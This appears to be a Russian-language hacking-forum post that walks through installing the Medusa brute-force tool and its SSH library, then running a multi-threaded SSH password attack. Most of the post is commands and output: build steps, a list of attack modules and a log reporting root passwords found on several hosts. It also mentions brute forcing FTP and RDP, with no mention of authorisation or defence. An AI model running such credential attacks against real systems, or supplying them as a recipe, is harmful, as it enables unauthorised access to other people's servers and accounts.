look2009
Professional
- Messages
- 162
- Reaction score
- 22
- Points
- 18
В этот раз мы будем использовать брут форс Medusa который поддерживает очень много модулей.
Вот весь список
Плюс к тому же еще и RDP в связке с rdesktop.
Скачать последнию версию можно с сайта разработчиков www.foofus.net/. Для брута SSH потребуется таже библиотека что и для hydra - libssh2.
Скачиваем библиотеку.
Устанавливаем.
Скачиваем Медузу.
Если библиотека встала нормально то после конфигурации
SSH будет открыт , сразу компилим и ставим .
И смотрим как встали модуль для медузы
Запускаем с 3 потоками
И смотри в лог фаил
На бруте SSH он не останавливается , им так же можно брутить и фтп и рдп ( имхо не особо порадовало , очень много пропусков из за того что патч для rdesktop не поддерживает ответы системы на языках отличных от инглиша ).
(С)n0klos
Вот весь список
Code:
AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP (NetWare), NNTP, PcAnywhere, POP3, PostgreSQL, rexec, rlogin, rsh, SMB, SMTP (AUTH/VRFY), SNMP, SSHv2, SVN, Telnet, VmAuthd, VNCПлюс к тому же еще и RDP в связке с rdesktop.
Скачать последнию версию можно с сайта разработчиков www.foofus.net/. Для брута SSH потребуется таже библиотека что и для hydra - libssh2.
Скачиваем библиотеку.
Code:
wget http://downloads.sourceforge.net/project/libssh2/libssh2/1.1/libssh2-1.1.tar.gz?use_mirror=sunetУстанавливаем.
Code:
tar -zxvf libssh2-1.1.tar.gz
cd libssh2-1.1
./configure && make && make installСкачиваем Медузу.
Code:
wget http://www.foofus.net/jmk/tools/medusa-1.5.tar.gz
tar -zxvf medusa-1.5.tar.gz
cd medusa-1.5
./configureЕсли библиотека встала нормально то после конфигурации
Code:
configure: Medusa Module Build Summary
configure:
configure: AFP ** Disabled **
configure: CVS Enabled
configure: FTP Enabled
configure: HTTP Enabled
configure: IMAP Enabled
configure: MSSQL Enabled
configure: MYSQL Enabled
configure: NCP ** Disabled **
configure: NNTP Enabled
configure: PCANYWHERE Enabled
configure: POP3 Enabled
configure: POSTGRES ** Disabled **
configure: REXEC Enabled
configure: RLOGIN Enabled
configure: RSH Enabled
configure: SMBNT Enabled
configure: SMTP Enabled
configure: SMTP-VRFY Enabled
configure: SNMP Enabled
configure: SSH Enabled
configure: SVN ** Disabled **
configure: TELNET Enabled
configure: VMAUTHD Enabled
configure: VNC Enabled
configure: WRAPPER Enabled
configure: WEB-FORM EnabledSSH будет открыт , сразу компилим и ставим .
Code:
make && make installИ смотрим как встали модуль для медузы
Code:
medusa -d
+ cvs.mod : Brute force module for CVS sessions : version 1.0.0
+ ftp.mod : Brute force module for FTP/FTPS sessions : version 1.3.0
+ http.mod : Brute force module for HTTP : version 1.3.0
+ imap.mod : Brute force module for IMAP sessions : version 1.2.0
+ mssql.mod : Brute force module for M$-SQL sessions : version 1.1.1
+ mysql.mod : Brute force module for MySQL sessions : version 1.2
+ nntp.mod : Brute force module for NNTP sessions : version 1.0.0
+ pcanywhere.mod : Brute force module for PcAnywhere sessions : version 1.0.2
+ pop3.mod : Brute force module for POP3 sessions : version 1.2
+ rexec.mod : Brute force module for REXEC sessions : version 1.1.1
+ rlogin.mod : Brute force module for RLOGIN sessions : version 1.0.2
+ rsh.mod : Brute force module for RSH sessions : version 1.0.1
+ smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 1.5
+ smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 1.0.0
+ smtp.mod : Brute force module for SMTP Authentication with TLS : version 1.0.0
+ snmp.mod : Brute force module for SNMP Community Strings : version 1.0.0
+ ssh.mod : Brute force module for SSH v2 sessions : version 1.0.2
+ telnet.mod : Brute force module for telnet sessions : version 1.2.2
+ vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 1.0.1
+ vnc.mod : Brute force module for VNC sessions : version 1.0.1
+ web-form.mod : Brute force module for web forms : version 1.0.0
+ wrapper.mod : Generic Wrapper Module : version 1.0.1Запускаем с 3 потоками
Code:
medusa -T 3 -H hosts.txt -U users.txt -P password.txt -O good.txt -M sshИ смотри в лог фаил
Code:
cat good.txt
PHP:
[root@localhost brr]# cat good
# Medusa v.1.5 (2009-07-24 19:56:33)
# /usr/local/bin/medusa -T 3 -H hosts -U users -P password -O good -M ssh
ACCOUNT FOUND: [ssh] Host: 172.16.0.92 User: root Password: superpass [SUCCESS]
ACCOUNT FOUND: [ssh] Host: 172.16.0.3 User: root Password: superpass[SUCCESS]
ACCOUNT FOUND: [ssh] Host: 172.16.0.8 User: root Password: superpass[SUCCESS]
ACCOUNT FOUND: [ssh] Host: 172.16.0.18 User: root Password: superpass [SUCCESS]
# Medusa has finished (2009-07-24 19:56:42).На бруте SSH он не останавливается , им так же можно брутить и фтп и рдп ( имхо не особо порадовало , очень много пропусков из за того что патч для rdesktop не поддерживает ответы системы на языках отличных от инглиша ).
(С)n0klos
